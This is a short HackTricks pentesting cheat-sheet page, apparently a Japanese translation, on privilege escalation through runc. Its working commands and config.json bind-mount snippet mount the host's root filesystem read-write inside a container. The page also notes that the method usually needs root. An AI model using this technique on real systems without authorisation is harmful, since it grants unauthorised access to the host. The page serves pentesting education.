hacktricks/linux-hardening/privilege-escalation/runc-privilege-escalation.md
2023-07-07 23:42:27 +00:00

5.1 KiB
Raw Blame History

RunC特権エスカレーション

☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥

基本情報

runcについて詳しく学びたい場合は、次のページを参照してください:

{% content-ref url="../../network-services-pentesting/2375-pentesting-docker.md" %} 2375-pentesting-docker.md {% endcontent-ref %}

PE

ホストにruncがインストールされていることがわかった場合、ホストのルート/フォルダをマウントしたコンテナを実行することができるかもしれません。

runc -help #Get help and see if runc is intalled
runc spec #This will create the config.json file in your current folder

Inside the "mounts" section of the create config.json add the following lines:
{
"type": "bind",
"source": "/",
"destination": "/",
"options": [
"rbind",
"rw",
"rprivate"
]
},

#Once you have modified the config.json file, create the folder rootfs in the same directory
mkdir rootfs

# Finally, start the container
# The root folder is the one from the host
runc run demo

{% hint style="danger" %} これは常に機能するわけではありません。runcのデフォルトの動作はrootとして実行することであり、非特権ユーザーとして実行することはできませんrootless構成を持っている場合を除く。rootless構成をデフォルトにすることは一般的には良いアイデアではありません。rootlessコンテナ内でのみ適用される制限がいくつか存在します。 {% endhint %}

☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥